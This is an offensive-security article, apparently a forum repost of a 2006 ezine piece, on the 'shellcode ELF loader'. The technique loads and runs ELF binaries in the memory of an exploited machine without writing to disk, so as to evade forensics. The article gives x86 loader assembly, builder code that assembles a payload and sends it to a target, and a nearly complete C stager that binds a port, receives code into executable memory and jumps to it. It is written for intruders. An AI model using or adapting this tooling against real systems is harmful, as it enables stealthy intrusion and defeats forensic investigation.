Advanced Antiforensics

Osiris · Feb 3, 2006

1 - Introduction
2 - Userland Execve
3 - Shellcode ELF loader
4 - Design and Implementation
4.1 - The lxobject
4.1.1 - Static ELF binary
4.1.2 - Stack context
4.1.3 - Shellcode loader
4.2 - The builder
4.3 - The jumper
5 - Multiexecution
5.1 - Gits
6 - Conclusion
7 - Greetings
8 - References
A - Tested systems
B - Sourcecode

---[ 1 - Introduction

The techniques of remote services' exploitation have made a substantial
progress. At the same time, the range of shellcodes have increased and
incorporates new and complex anti-detection techniques like polymorphism
functionalities.

In spite of the advantages that all these give to the attackers, a call to
the syscall execve is always needed; that ends giving rise to a series of
problems:

- The access to the syscall execve may be denied if the host uses some
kind of modern protection system.

- The call to execve requires the file to execute to be placed in the
hard disk. Consequently, if '/bin/shell' does not exist, which is a
common fact in chroot environments, the shellcode will not be executed
properly.

- The host may not have tools that the intruder may need, thus creating
the need to upload them, which can leave traces of the intrusion in
the disk.

The need of a shellcode that solves them arises. The solution is found in
the 'userland exec'.

---[ 2 - Userland Execve

The procedure that allows the local execution of a program avoiding the use
of the syscall execve is called 'userland exec' or 'userland execve'.
It's basically a mechanism that simulates correctly and orderly most of the
procedures that the kernel follows to load an executable file in memory and
start its execution. It can be summarized in just three steps:

- Load of the binary's required sections into memory.
- Initialization of the stack context.
- Jump to the entry point (starting point).

The main aim of the 'userland exec' is to allow the binaries to load avoiding
the use of the syscall execve that the kernel contains, solving the first of
the problems stated above. At the same time, as it is a specific implementation
we can adapt its features to our own needs. We'll make it so the ELF file
will not be read from the hard disk but from other supports like a socket.
With this procedure, the other two problems stated before are solved because
the file '/bin/sh' doesn't need to be visible by the exploited process but
can be read from the net. On the other hand, tools that don't reside in the
destination host can also be executed.

The first public implementation of a execve in a user environment was made by
"the grugq" [1], its codification and inner workings are perfect but it has
some disadvantages:

- Doesn't work for real attacks.
- The code is too large and difficult to port.

Thanks to that fact it was decided to put our efforts in developing another
'userland execve' with the same features but with a simpler codification and
oriented to exploits' use. The final result has been the 'shellcode ELF
loader'.

---[ 3 - Shellcode ELF loader

The shellcode ELF loader or Self is a new and sophisticated post-exploitation
technique based on the userland execve. It allows the load and execution of
a binary ELF file in a remote machine without storing it on disk or modifying
the original filesystem. The target of the shellcode ELF loader is to provide
an effective and modern post-exploitation anti-forensic system for exploits
combined with an easy use. That is, that an intruder can execute as many
applications as he desires.

---[ 4 - Design and Implementation

Obtaining an effective design hasn't been an easy task, different options
have been considered and most of them have been dropped. At last, it was
selected the most creative design that allows more flexibility, portability
and a great ease of use.

The final result is a mix of multiple pieces, independent one of another,
that realize their own function and work together in harmony. This pieces
are three: the lxobject, the builder and the jumper. These elements will make
the task of executing a binary in a remote machine quite easy. The lxobject
is a special kind of object that contains all the required elements to change
the original executable of a guest process by a new one. The builder and
jumper are the pieces of code that build the lxobject, transfer it from the
local machine (attacker) to the remote machine (attacked) and activate it.

As a previous step before the detailed description of the inner details of
this technique, it is needed to understand how, when and where it must be
used. Here follows a short summary of its common use:

- 1st round, exploitation of a vulnerable service:

In the 1st round we have a machine X with a vulnerable service Y. We want to
exploit this juicy process so we use the suitable exploit using as payload
(shellcode) the jumper. When exploited, the jumper is executed and we're
ready to the next round.

- 2nd round, execution of a binary:

Here is where the shellcode ELF loader takes part; a binary ELF is selected
and the lxobject is constructed. Then, we sent it to the jumper to be
activated. The result is the load and execution of the binary in a remote
machine. We win the battle!!

---[ 4.1 - The lxobject

What the **** is that? A lxobject is an selfloadable and autoexecutable
object, that is to say, an object specially devised to completely replace the
original guest process where it is located by a binary ELF file that carries
and initiates its execution. Each lxobject is built in the intruder machine
using the builder and it is sent to the attacked machine where the jumper
receives and activates it.

Therefore, it can be compared to a missile that is sent from a place to the
impact point, being the explosive charge an executable. This missile is built
from three assembled parts: a binary static ELF, a preconstructed stack
context and a shellcode loader.

---[ 4.1.1 - Static ELF binary

It's the first piece of a lxobject, the binary ELF that must be loaded and
executed in a remote host. It's just a common executable file, statically
compiled for the architecture and system in which it will be executed.

It was decided to avoid the use of dynamic executables because it would add
complexity which isn't needed in the loading code, noticeably raising the
rate of possible errors.

---[ 4.1.2 - Stack context

It's the second piece of a lxobject; the stack context that will be needed by
the binary. Every process has an associated memory segment called stack where
the functions store its local variables. During the binary load process, the
kernel fills this section with a series of initial data requited for its
subsequent execution. We call it 'initial stack context'.

To ease the portability and specially the loading process, a preconstructed
stack context was adopted. That is to say, it is generated in our machine and
it is assembled with the binary ELF file. The only required knowledge is the
format and to add the data in the correct order. To the vast majority of
UNIX systems it looks like:

.----------------.
.--> | alignment |
| |================|
| | Argc | - Arguments (number)
| |----------------|
| | Argv[] | ---. - Arguments (vector)
| |----------------| |
| | Envp[] | ---|---. - Environment variables (vector)
| |----------------| | |
| | argv strings | <--' |
| |----------------| | - Argv and envp data (strings)
| | envp strings | <------'
| |================|
'--- | alignment | -------> Upper and lower alignments
'----------------'

This is the stack context, most reduced and functional available for us. As
it can be observed no auxiliary vector has been added because the work with
static executables avoids the need to worry about linking. Also, there isn't
any restriction about the allowed number of arguments and environment
variables; a bunch of them can increase the context's size but nothing more.

As the context is built in the attacker machine, that will usually be
different from the attacked one; knowledge of the address space in which the
stack is placed will be required. This is a process that is automatically
done and doesn't suppose a problem.

_--[ 4.1.3 - Shellcode Loader

This is the third and also the most important part of a lxobject. It's a
shellcode that must carry on the loading process and execution of a binary
file. it is really a simple but powerful implementation of userland execve().

The loading process takes the following steps to be completed successfully
(x86 32bits):

* pre-loading: first, the jumper must do some operations before anything
else. It gets the memory address where the lxobject has been previously
stored and pushes it into the stack, then it finds the loader code and
jumps to it. The loading has begun.

__asm__(
"push %0\n"
"jmp *%1"
:
: "c"(lxobject),"b"(*loader)
);

* loading step 1: scans the program header table and begins to load each
PT_LOAD segment. The stack context has its own header, PT_STACK, so when
this kind of segment is found it will be treated differently from the
rest (step 2)

.loader_next_phdr:
// Check program header type (eax): PT_LOAD or PT_STACK
movl (%edx),%eax

// If program header type is PT_LOAD, jump to .loader_phdr_load
// and load the segment referenced by this header
cmpl $PT_LOAD,%eax
je .loader_phdr_load

// If program header type is PT_STACK, jump to .loader_phdr_stack
// and load the new stack segment
cmpl $PT_STACK,%eax
je .loader_phdr_stack

// If unknown type, jump to next header
addl $PHENTSIZE,%edx
jmp .loader_next_phdr

For each PT_LOAD segment (text/data) do the following:

* loading step 1.1: unmap the old segment, one page a time, to be sure that
there is enough room to fit the new one:

movl PHDR_VADDR(%edx),%edi
movl PHDR_MEMSZ(%edx),%esi
subl $PG_SIZE,%esi
movl $0,%ecx
.loader_unmap_page:
pushl $PG_SIZE
movl %edi,%ebx
andl $0xfffff000,%ebx
addl %ecx,%ebx
pushl %ebx
pushl $2
movl $SYS_munmap,%eax
call do_syscall
addl $12,%esp
addl $PG_SIZE,%ecx
cmpl %ecx,%esi
jge .loader_unmap_page

* loading step 1.2: map the new memory region.

pushl $0
pushl $0
pushl $-1
pushl $MAPS
pushl $7
movl PHDR_MEMSZ(%edx),%esi
pushl %esi
movl %edi,%esi
andl $0xffff000,%esi
pushl %esi
pushl $6
movl $SYS_mmap,%eax
call do_syscall
addl $32,%esp

* loading step 1.3: copy the segment from the lxobject to that place:

movl PHDR_FILESZ(%edx),%ecx
movl PHDR_OFFSET(%edx),%esi
addl %ebp,%esi
repz movsb

* loading step 1.4: continue with next header:

addl $PHENTSIZE,%edx
jmp .loader_next_phdr

* loading step 2: when both text and data segments have been loaded
correctly, it's time to setup a new stack:

.loader_phdr_stack:
movl PHDR_OFFSET(%edx),%esi
addl %ebp,%esi
movl PHDR_VADDR(%edx),%edi
movl PHDR_MEMSZ(%edx),%ecx
repz movsb

* loading step 3: to finish, some registers are cleaned and then the loader
jump to the binary's entry point or _init().

.loader_entry_point:
movl PHDR_ALIGN(%edx),%esp
movl EHDR_ENTRY(%ebp),%eax
xorl %ebx,%ebx
xorl %ecx,%ecx
xorl %edx,%edx
xorl %esi,%esi
xorl %edi,%edi
jmp *%eax

* post-loading: the execution has begun.

As can be seen, the loader doesn't undergo any process to build the stack
context, it is constructed in the builder. This way, a pre-designed context is
available and should simply be copied to the right address space inside the
process.

Despite the fact of codifying a different loader to each architecture the
operations are plain and concrete. Whether possible, hybrid loaders capable
of functioning in the same architectures but with the different syscalls
methods of the UNIX systems should be designed. The loader we have developed
for our implementation is an hybrid code capable of working under Linux and
BSD systems on x86/32bit machines.

---[ 4.2 - The builder

It has the mission of assembling the components of a lxobject and then
sending it to a remote machine. It works with a simple command line design
and its format is as follows:

./builder <host> <port> <exec> <argv> <envp>

where:

host, port = the attached machine address and the port where the jumper is
running and waiting

exec = the executable binary file we want to execute

argv, envp = string of arguments and string of environment variables,
needed by the executable binary

For instance, if we want to do some port scanning from the attacked host, we
will execute an nmap binary as follows:

./builder 172.26.0.1 2002 nmap-static "-P0;-p;23;172.26.1-30" "PATH=/bin"

Basically, the assembly operations performed are the following:

* allocate enough memory to store the executable binary file, the shellcode
loader and the stack's init context.

elf_new = (void*)malloc(elf_new_size);

* insert the executable into the memory area previously allocated and then
clean the fields which describe the section header table because they
won't be useful for us as we will work with an static file. Also, the
section header table could be removed anyway.

ehdr_new->e_shentsize = 0;
ehdr_new->e_shoff = 0;
ehdr_new->e_shnum = 0;
ehdr_new->e_shstrndx = 0;

* build the stack context. It requires two strings, the first one contains
the arguments and the second one the environment variables. Each item is
separated by using a delimiter. For instance:

<argv> = "arg1;arg2;arg3;-h"
<envp> = "PATH=/bin;SHELL=sh"

Once the context has been built, a new program header is added to the
binary's program header table. This is a PT_STACK header and contains all
the information which is needed by the shellcode loader in order to setup
the new stack.

* the shellcode ELF loader is introduced and its offset is saved within the
e_ident field in the elf header.

memcpy(elf_new + elf_new_size - PG_SIZE + LOADER_CODESZ, loader, LOADER_CODESZ);
ldr_ptr = (unsigned long *)&ehdr_new->e_ident[9];
*ldr_ptr = elf_new_size - PG_SIZE + LOADER_CODESZ;

* the lxobject is ready, now it's sent to specified the host and port.

connect(sfd, (struct sockaddr *)&srv, sizeof(struct sockaddr)
write(sfd, elf_new, elf_new_size);

An lxobject finished and assembled correctly, ready to be sent, looks like
this:

[ Autoloadable and Autoexecutable Object ]
.------------------------------------------------
|
| [ Static Executable File (1) ]
| .--------------------------------.
| | |
| | .----------------------. |
| | | ELF Header )---------|----|--.
| | |----------------------| | | Shellcode Elf loader (3)
| | | Program Header Table | | | hdr->e_ident[9]
| | | | | |
| | | + PT_LOAD0 | | |
| | | + PT_LOAD1 | | |
| | | ... | | |
| | | ... | | |
| | | + PT_STACK )---------|----|--|--.
| | | | | | | Stack Context (2)
| | |----------------------| | | |
| | | Sections (code/data) | | | |
| '--> |----------------------| <--' | |
| .--> |######################| <-----' |
| | |## SHELLCODE LOADER ##| |
| P | |######################| |
| A | | | |
| G | | ....... | |
| E | | ....... | |
| | | | |
| | |######################| <--------'
| | |#### STACK CONTEXT ###|
| | |######################|
| '--> '----------------------'
|
'-----------------

---[ 4.3 - The jumper

It is the shellcode which have to be used by an exploit during the exploitation
process of a vulnerable service. Its focus is to activate the incoming lxobject
and in order to achieve it, at least the following operations should be done:

- open a socket and wait for the lxobject to arrive
- store it anywhere in the memory
- activate it by jumping into the loader

Those are the minimal required actions but it is important to keep in mind
that a jumper is a simple shellcode so any other functionality can be added
previously: break a chroot, elevate privileges, and so on.

1) how to get the lxobject?

It is easily achieved, already known techniques, as binding to a port and
waiting for new connections or searching in the process' FD table those that
belong to socket, can be applied. Additionally, cipher algorithms can be
added but this would lead to huge shellcodes, difficult to use.

2) and where to store it?

There are three possibilities:

a) store it in the heap. We just have to find the current location of the
program break by using brk(0). However, this method is dangerous and
unsuitable because the lxobject could be unmapped or even entirely
overwritten during the loading process.

b) store it in the process stack. Provided there is enough space and we know
where the stack starts and finishes, this method can be used but it can
also be that the stack isn't be executable and then it can't be applied.

c) store it in a new mapped memory region by using mmap() syscall.
This is the better way and the one we have used in our code.

Due to the nature of a jumper its codification can be personalized and
adapted to many different contexts. An example of a generic jumper written
in C is as it follows:

lxobject = (unsigned char*)mmap(0, LXOBJECT_SIZE,
PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 0);

addr.sin_family = AF_INET;
addr.sin_port = htons(atoi(argv[1]));
addr.sin_addr.s_addr = 0;

sfd = socket(AF_INET, SOCK_STREAM, 0));
bind(sfd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in));
listen(sfd, 10);
nsfd = accept(sfd, NULL, NULL));

for (i = 0 ; i < 255 ; i++) {
if (recv(i, tmp, 4, MSG_PEEK) == 4) {
if (!strncmp(&tmp[1], "ELF", 3)) break;
}
}

recv(i, lxobject, MAX_OBJECT_SIZE, MSG_WAITALL);

loader = (unsigned long *)&lxobject[9];
*loader += (unsigned long)lxobject;

__asm__(
"push %0\n"
"jmp *%1"
:
: "c"(lxobject),"b"(*loader)
);

---[ 5 - Multiexecution

The code included in this article is just a generic implementation of a
shellcode ELF loader which allows the execution of a binary once at time.
If we want to execute that binary an undefined number of times (to parse more
arguments, test new features, etc) it will be needed to build and send a new
lxobject for each try. Although it obviously has some disadvantages, it's
enough for most situations. But what happens if what we really wish is to
execute our binary a lot of times but from the other side, that is, from
the remote machine, without building the lxobject?

To face this issue we have developed another technique called "multi-execution".
The multi-execution is a much more advanced derived implementation. Its main
feature is that the process of building a lxobject is always done in the
remote machine, one binary allowing infinite executions. Something like
working with a remote shell. One example of tool that uses a multi-execution
environment is the gits project or "ghost in the system".

_--[ 5.1 - Gits

Gits is a multi-execution environment designed to operate on attacked remote
machines and to limit the amount of forensic evidence. It should be viewed as
a proof of concept, an advanced extension with many features. It comprises a
launcher program and a shell, which is the main part. The shell gives you the
possibility of retrieving as many binaries as desired and execute them as
many times as wished (a process of stack context rebuilding and binary
patching is done using some advanced techniques). Also, built-in commands, job
control, flow redirection, remote file manipulation, and so on have been
added.

---[ 6 - Conclusions

The forensic techniques are more sophisticated and complete every day, where
there was no trace left, now there's a fingerprint; where there was only one
evidence left, now there are hundreds. A never-ending battle between those who
wouldn't be detected and those who want to detect. To use the memory and
leave the disk untouched is a good policy to avoid the detection. The
shellcode ELF loader develops this post-exploitation plainly and elegantly.

---[ 7 - Greetings

7a69ezine crew & redbull.

---[ 8 - References

[1] The Design and Implementation of ul_exec - the grugq
http://securityfocus.com/archive/1/348638/2003-12-29/2004-01-04/0

[2] Remote Exec - the grugq
http://www.phrack.org/show.php?p=62&a=8

[3] Ghost In The System Project
http://www.7a69ezine.org/project/gits

---[ A - Tested systems

The next table summarize the systems where we have tested all this ****ing
****.

/----------v----------\
| x86 | amd64 |
/------------+----------+----------<
| Linux 2.4 | works | works |
>------------+----------+----------<
| Linux 2.6 | works | works |
>------------+----------+----------<
| FreeBSD | works | untested |
>------------+----------+----------<
| NetBSD | works | untested |
\------------^----------^----------/

Advanced Antiforensics

Osiris

Golden Master

Similar threads